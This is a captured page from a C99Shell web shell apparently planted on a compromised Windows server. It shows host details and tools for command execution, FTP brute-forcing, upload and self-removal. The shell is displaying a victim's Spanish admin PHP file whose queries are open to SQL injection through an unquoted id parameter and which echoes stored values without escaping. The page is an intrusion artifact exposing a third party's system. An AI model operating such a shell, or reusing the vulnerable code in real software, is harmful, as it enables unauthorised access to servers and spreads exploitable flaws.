!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\php\OAB\admin\files\   drwxrwxrwx
Free 4.09 GB of 39.52 GB (10.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     nivel1.php (6.28 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php require_once('../../Connections/oa.php'); ?>
<?php
function GetSQLValueString($theValue$theType$theDefinedValue ""$theNotDefinedValue ""
{
  
$theValue = (!get_magic_quotes_gpc()) ? addslashes($theValue) : $theValue;

  switch (
$theType) {
    case 
"text":
      
$theValue = ($theValue != "") ? "'" $theValue "'" "NULL";
      break;    
    case 
"long":
    case 
"int":
      
$theValue = ($theValue != "") ? intval($theValue) : "NULL";
      break;
    case 
"double":
      
$theValue = ($theValue != "") ? "'" doubleval($theValue) . "'" "NULL";
      break;
    case 
"date":
      
$theValue = ($theValue != "") ? "'" $theValue "'" "NULL";
      break;
    case 
"defined":
      
$theValue = ($theValue != "") ? $theDefinedValue $theNotDefinedValue;
      break;
  }
  return 
$theValue;
}

$editFormAction $HTTP_SERVER_VARS['PHP_SELF'];
if (isset(
$HTTP_SERVER_VARS['QUERY_STRING'])) {
  
$editFormAction .= "?" $HTTP_SERVER_VARS['QUERY_STRING'];
}

if ((isset(
$HTTP_POST_VARS["MM_insert"])) && ($HTTP_POST_VARS["MM_insert"] == "form1")) {
  
$insertSQL sprintf("INSERT INTO prueba (titulo, texto) VALUES (%s, %s)",
                       
GetSQLValueString($HTTP_POST_VARS['titulo'], "text"),
                       
GetSQLValueString($HTTP_POST_VARS['texto'], "text"));

  
mysql_select_db($database_oa$oa);
  
$Result1 mysql_query($insertSQL$oa) or die(mysql_error());

  
$insertGoTo "nivel1.php";
  if (isset(
$HTTP_SERVER_VARS['QUERY_STRING'])) {
    
$insertGoTo .= (strpos($insertGoTo'?')) ? "&" "?";
    
$insertGoTo .= $HTTP_SERVER_VARS['QUERY_STRING'];
  }
  
header(sprintf("Location: %s"$insertGoTo));
}

$idx_rsnivel1 "0";
if (isset(
$id)) {
  
$idx_rsnivel1 = (get_magic_quotes_gpc()) ? $id addslashes($id);
}
mysql_select_db($database_oa$oa);
$query_rsnivel1 sprintf("SELECT * FROM nivel1 WHERE idnivel1=%s ORDER BY idnivel1"$idx_rsnivel1);
$rsnivel1 mysql_query($query_rsnivel1$oa) or die(mysql_error());
$row_rsnivel1 mysql_fetch_assoc($rsnivel1);
$totalRows_rsnivel1 mysql_num_rows($rsnivel1);
?>
<html>
<head>
<title>UPLOAD</title>
<!-- tinyMCE -->
<script language="javascript" type="text/javascript" src="../texto/tinymce/jscripts/tiny_mce/tiny_mce.js"></script>
<script language="javascript" type="text/javascript">
tinyMCE.init({
    theme : "advanced",
        language : "es",
    theme_advanced_resizing : true,
    theme_advanced_disable : "cleanup,code,help,styleselect,cut,copy,paste",
    mode : "textareas",
    plugins : "table,save,advhr,advimage,emotions,iespell,insertdatetime,preview,zoom,flash,searchreplace,print,contextmenu",
    theme_advanced_buttons1_add_before : "save,separator",
    theme_advanced_buttons1_add : "fontselect,fontsizeselect",
    theme_advanced_buttons2_add : "separator,insertdate,inserttime,preview,zoom,separator,forecolor,backcolor",
    theme_advanced_buttons3_add : "emotions,iespell,flash,advhr,separator,print",
    theme_advanced_buttons2_add_before: "cut,copy,paste,separator,search,replace,separator",
    theme_advanced_buttons3_add_before : "tablecontrols,separator",
    theme_advanced_toolbar_location : "top",
    theme_advanced_toolbar_align : "center",
    theme_advanced_path_location : "bottom",
    plugin_insertdate_dateFormat : "%Y-%m-%d",
    plugin_insertdate_timeFormat : "%H:%M:%S",
    extended_valid_elements : "a[name|href|target|title|onclick],img[class|src|border=0|alt|title|hspace|vspace|width|height|align|onmouseover|onmouseout|name],hr[class|width|size|noshade],font[face|size|color|style],span[class|align|style]",
    external_link_list_url : "tinymce/example/example_link_list.js",
    external_image_list_url : "tinymce/example/example_image_list.js",
    flash_external_list_url : "tinymce/example/example_flash_list.js",
    theme_advanced_buttons3_add : "pastetext,pasteword,selectall"
});
function convertWord(type, content) {
    switch (type) {
        // Gets executed before the built in logic performes it's cleanups
        case "before":
            content = content.toLowerCase(); // Some dummy logic
            break;

        // Gets executed after the built in logic performes it's cleanups
        case "after":
            content = content.toLowerCase(); // Some dummy logic
            break;
    }

    return content;
}

</script>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="../css/adminestilos.css" rel="stylesheet" type="text/css">

</head>

<body>
<table width="600" border="1" align="center" cellpadding="0" cellspacing="0">
  <tr> 
    <td>&nbsp;</td>
  </tr>
  <tr> 
    <td>
<form name="form1" method="POST" action="<?php echo $editFormAction?>">
        <br>
        <table width="90%" border="1" align="center" cellpadding="0" cellspacing="0">
          <tr class="titulos1"> 
            <td><div align="center"></div></td>
            <td><div align="center">Contenido Actual</div></td>
            <td><div align="center">Nuevo Contenido</div></td>
          </tr>
          <tr class="texto"> 
            <td>Nombre secci&oacute;n</td>
            <td><?php echo $row_rsnivel1['nombre']; ?> </td>
            <td> <br> <br> <input name="titulo" type="text" id="titulo"> </td>
          </tr>
          <tr class="texto"> 
            <td>&nbsp;</td>
            <td><?php echo $row_rsnivel1['tooltip']; ?> </td>
            <td> <textarea id="texto" name="texto" rows="10" cols="60">
</textarea> 
            </td>
          </tr>
          <tr class="texto"> 
            <td>&nbsp;</td>
            <td bgcolor=<?php echo $row_rsnivel1['colorbase']; ?>>&nbsp; 
            </td>
            <td>&nbsp; </td>
          </tr>
          <tr class="texto"> 
            <td>&nbsp;</td>
            <td bgcolor=<?php echo $row_rsnivel1['colordos']; ?>>&nbsp; 
            </td>
            <td><input type="submit" name="Submit" value="Enviar"> </td>
          </tr>
          <tr class="texto"> 
            <td>&nbsp;</td>
            <td>&nbsp;</td>
            <td>&nbsp; </td>
          </tr>
          <tr class="texto"> 
            <td>&nbsp;</td>
            <td>&nbsp;</td>
            <td>&nbsp;</td>
          </tr>
        </table>
        <p>&nbsp; </p>
        <input type="hidden" name="MM_insert" value="form1">
      </form></td>
  </tr>
  <tr> 
    <td>&nbsp;</td>
  </tr>
</table>
</body>
</html>
<?php
mysql_free_result
($rsnivel1);
?>


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--